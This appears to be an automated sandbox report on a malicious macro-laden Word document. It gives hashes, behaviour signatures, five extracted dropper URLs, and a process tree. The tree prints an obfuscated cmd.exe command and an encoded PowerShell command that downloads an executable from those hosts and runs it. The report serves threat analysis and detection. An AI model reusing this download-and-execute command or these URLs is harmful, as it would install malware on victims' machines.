Analysis
-
max time kernel
118s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
-
submitted
02-06-2024 15:45
General
-
Target
8e9915043975b67b01971a4ad74fe789_JaffaCakes118.doc
-
Size
78KB
-
MD5
8e9915043975b67b01971a4ad74fe789
-
SHA1
fb0e04b39f2ee5400e89c08f0ce8cb2bf66d97a5
-
SHA256
07afeb101eab97daac3863600d40b1851bd710d4481dbe0a93459fd07624e468
-
SHA512
85813d5d38ac484c5d915c1352d4ea015ee2df145bd028323a53c62d6f1995720e86fe3957230c734a71b84d345ea47c9dc1e68520d319d0f8a80c790988a844
-
SSDEEP
1536:VptJlmrJpmxlRw99NBE+aGW3CDp1n+xYpKY:rte2dw99fk3mbn+2pZ
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://alpharockgroup.com/HT
exe.dropper
http://adminflex.dk/l5TF6w
exe.dropper
http://gailong.net/X5AyWfJG
exe.dropper
http://shunji.org/logsite/TJaaB
exe.dropper
http://binar48.ru/OtTlVIU5
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 1 IoCs
-
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
-
Drops file in Windows directory 1 IoCs
-
Office loads VBA resources, possible macro or embedded object present
-
Modifies Internet Explorer settings 1 TTPs 31 IoCs
-
Modifies registry class 64 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 12 IoCs
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\8e9915043975b67b01971a4ad74fe789_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
C:\Windows\SysWOW64\Cmd.exeCmd /V^:^oN /r "^Se^T ^ ^ ^J^e^4=^A^AC^AgA^AI^A^AC^A^gAA^IA^ACA^g^AA^IAACA^g^AA^I^A^ACA^gA^A^I^A^AC^A^gAQ^fA0^H^A^7BA^aA^M^GA0BQ^YA^M^G^A9^BwOAs^GAhBQZAI^HAiB^w^OAs^EA^u^B^wdA^QC^A^gA^Q^b^AU^G^A^0^B^Q^S^A0C^AlBwa^A8G^A2Bg^bAk^EA^7^A^Q^K^A^sEA^u^B^wdA^QCAgAA^LA^sE^AL^B^g^S^A^QCAo^AQZA^wGApBgRA^QGA^hBwbA^w^G^AuB^w^d^A^8^G^A^E^B^gLA^E^FA^UBgeAQC^A7B^Q^e^A^I^HA0^B^w^e^A^kC^Ar^BgeAg^F^Ak^A^A^IA4GA^pB^A^IA^sEALB^g^SA^QCAoA^AaAMG^A^hBQZAI^HAvBg^Z^A^s^DAnAQZAg^H^Al^Bg^LAcCArAge^AcFAZ^B^AJAsCAn^AAXAcCAr^A^w^Y^A^kGAsB^gYA^U^HA^wB^gOAYH^Au^B^Q^ZAQC^A9Aw^S^A^4^GA3^B^AJ^A^s^DAnA^gM^Ak^DA^2A^wJ^AACA9A^A^IA^oHA^X^B^QW^AQCA7AQKAcC^A^ABwJ^A^gC^A0BQa^A^wG^A^wB^w^UA4CAn^A^QN^AU^F^AJBgV^A^wG^AUB^AdA8^EAv^A^Q^dA^IHA^u^A^AO^A^Q^D^A^yBQY^A4^G^A^p^BgYA^8C^Av^Ag^OA^AH^A^0B^A^d^A^gG^A^A^B^gQ^A^EG^AhBg^SA^QFAv^A^QZ^AQH^ApB^wc^Ac^G^AvB^AbA^8C^An^B^gcA8GA^uA^QaA^oG^AuB^QdA^gGA^zB^wLA8CA^6^A^AcA^Q^H^A0^B^Aa^AA^EA^H^B^g^SAYGA^X^BQe^AE^EA^1^A^AWA8CA0^B^QZ^A^4GA^uAw^Z^A^4^GAvB^A^b^Ak^GA^h^B^wZ^A8CAvA^gO^AA^H^A^0^BAd^Ag^GAAB^w^dAYD^AG^B^AVA^UD^A^s^BwL^A^s^G^AkBgLA^g^HAl^BAb^AYG^A^u^BQ^a^A0GAk^BQ^YA^8C^Av^AgO^A^AH^A^0B^AdA^g^G^A^ABAV^Ag^E^AvA^QbA8G^AjBg^LA^A^HA^1BwbA^IHAnBwaAMGAvB^gc^A^EGAo^BAcAw^GAh^BwLA8C^A6^A^Ac^A^QH^A^0B^A^a^AcC^A^9^Awa^A^oH^A^Y^B^A^JA^s^DA^0B^gbA^U^G^Ap^BA^bA^M^E^A^iB^Q^Z^AcFA^uA^AdA^UG^A^O^BA^IA^Q^HAjB^Q^Z^Ao^G^A^iB^wb^A^0CA^3B^QZA^4GA^9AQ^UA^QF^A6B^A^J^ ^e^-^ ^l^l^e^hsr^e^wo^p& ^foR /^L %^B ^IN ( ^ 9^25^ ^ ^-^1 ^ ^0) D^O s^E^t ^OQR^J=!^OQR^J!!^J^e^4:~ %^B, 1!&& I^f %^B ^LEQ ^0 Ca^L^l %^OQR^J:^*OQRJ^!^=% "2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e JAB6AFQAUQA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABYAHoAawA9ACcAaAB0AHQAcAA6AC8ALwBhAGwAcABoAGEAcgBvAGMAawBnAHIAbwB1AHAALgBjAG8AbQAvAEgAVABAAGgAdAB0AHAAOgAvAC8AYQBkAG0AaQBuAGYAbABlAHgALgBkAGsALwBsADUAVABGADYAdwBAAGgAdAB0AHAAOgAvAC8AZwBhAGkAbABvAG4AZwAuAG4AZQB0AC8AWAA1AEEAeQBXAGYASgBHAEAAaAB0AHQAcAA6AC8ALwBzAGgAdQBuAGoAaQAuAG8AcgBnAC8AbABvAGcAcwBpAHQAZQAvAFQASgBhAGEAQgBAAGgAdAB0AHAAOgAvAC8AYgBpAG4AYQByADQAOAAuAHIAdQAvAE8AdABUAGwAVgBJAFUANQAnAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQAWQBXAHoAIAA9ACAAJwA2ADkAMgAnADsAJAB3AG4ASwA9ACQAZQBuAHYAOgBwAHUAYgBsAGkAYwArACcAXAAnACsAJABZAFcAegArACcALgBlAHgAZQAnADsAZgBvAHIAZQBhAGMAaAAoACQASgBLAEsAIABpAG4AIAAkAFgAegBrACkAewB0AHIAeQB7ACQAegBUAFEALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQASgBLAEsALAAgACQAdwBuAEsAKQA7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQAdwBuAEsAOwBiAHIAZQBhAGsAOwB9AGMAYQB0AGMAaAB7AH0AfQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
20KB
MD57108f09baa962c6011932d3724c7b239
SHA1adfe02d417a11ad901b56d59b18a31a89d312f5e
SHA256cb486e1f3b05fee3acfede7871647bc70d2f2ab2593e55f2d34c574535209fac
SHA5120967fa3d78405f8905445f06d7595192afdb1d1924d48270d7aa934b3d67a0bf333eae3ed6bf3a75c51b8433713884e5be0fda88b7d29e5c4fa63efee9a63936
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
4KB
-
Filesize
1024KB
-
Filesize
44KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
44KB
-
Filesize
1024KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
44KB
-
Filesize
1024KB